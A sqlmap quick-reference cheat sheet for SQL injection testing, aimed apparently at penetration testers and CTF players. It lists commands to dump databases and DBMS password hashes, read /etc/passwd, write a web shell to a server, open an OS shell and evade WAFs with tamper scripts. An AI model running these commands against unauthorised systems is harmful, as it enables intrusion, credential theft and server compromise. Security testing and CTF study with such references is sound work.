SQLMap Quick Reference
=====================

BASIC USAGE
  sqlmap -u "http://target/page?id=1"             Test the URL's GET parameters for injection
  sqlmap -u "http://target/page?id=1" --dbs       List databases
  sqlmap -u "http://target/page?id=1" -D db --tables    List tables
  sqlmap -u "http://target/page?id=1" -D db -T tbl --dump   Dump table

POST REQUEST
  sqlmap -u "http://target/login" --data="user=a&pass=b"           Send as POST body, test the body parameters
  sqlmap -u "http://target/login" --data="user=a&pass=b" -p user   Test only the "user" parameter

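FROM FILE (Burp/ZAP request)
  sqlmap -r request.txt      Load a raw HTTP request saved from the proxy (method, headers, cookies and body are reused)
                             request.txt holds the session cookie/token in clear text; store it like a credential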

DETECTION
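  --level=5             Test level 1-5 (default 1): more payloads; Cookie is tested from level 2, User-Agent/Referer from level 3
  --risk=3              Risk level 1-3 (default 1): 2 adds heavy time-based tests, 3 adds OR-based tests, which can modify data (e.g. when the injection is in an UPDATE statement)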
  -p param              Test specific parameter
  --dbms=mysql          Specify DBMS
  --technique=BEUSTQ    Restrict testing to the listed techniques (letters under TECHNIQUES; default is all six)

ENUMERATION
  --current-user        Current database user
  --current-db          Current database
  --dbs                 List all databases
  --tables              List tables
  --columns             List columns
  --dump                Dump data
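  --dump-all            Dump all tables of every database (add --exclude-sysdbs to skip system databases)
  --passwords           Enumerate DBMS users' password hashes (database accounts, not application users)
  --privileges          Enumerate DBMS users' privileges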

AUTHENTICATION
  --cookie="session=abc"          Cookie
  --headers="Authorization: Bearer tok"   Header
  --auth-type=basic --auth-cred=user:pass   HTTP authentication (Basic here)
  --proxy=http://127.0.0.1:8080             Send requests through a local intercepting proxy (e.g. Burp/ZAP)

TECHNIQUES
  B  Boolean-based blind
  E  Error-based
  U  Union query
  S  Stacked queries
  T  Time-based blind
  Q  Inline queries

OPTIONS
  --batch              Never prompt; take the default answer to every question
  --threads=5          Concurrent HTTP requests (default 1, maximum 10)
  --random-agent       Random User-Agent
  --tamper=space2comment   Use tamper script
  --os-shell           OS command shell
  --sql-shell          SQL interactive shell
  --file-read=/etc/passwd   Read file
  --file-write=shell.php --file-dest=/var/www/shell.php

COMMON CTF PATTERNS
  # Basic enumeration
  sqlmap -u "http://target/?id=1" --batch --dbs
  sqlmap -u "http://target/?id=1" --batch -D ctf --tables
  sqlmap -u "http://target/?id=1" --batch -D ctf -T flag --dump

  # Bypass WAF
  sqlmap -u URL --tamper=space2comment,between,randomcase

  # Read flag file
  sqlmap -u URL --file-read="/flag.txt"
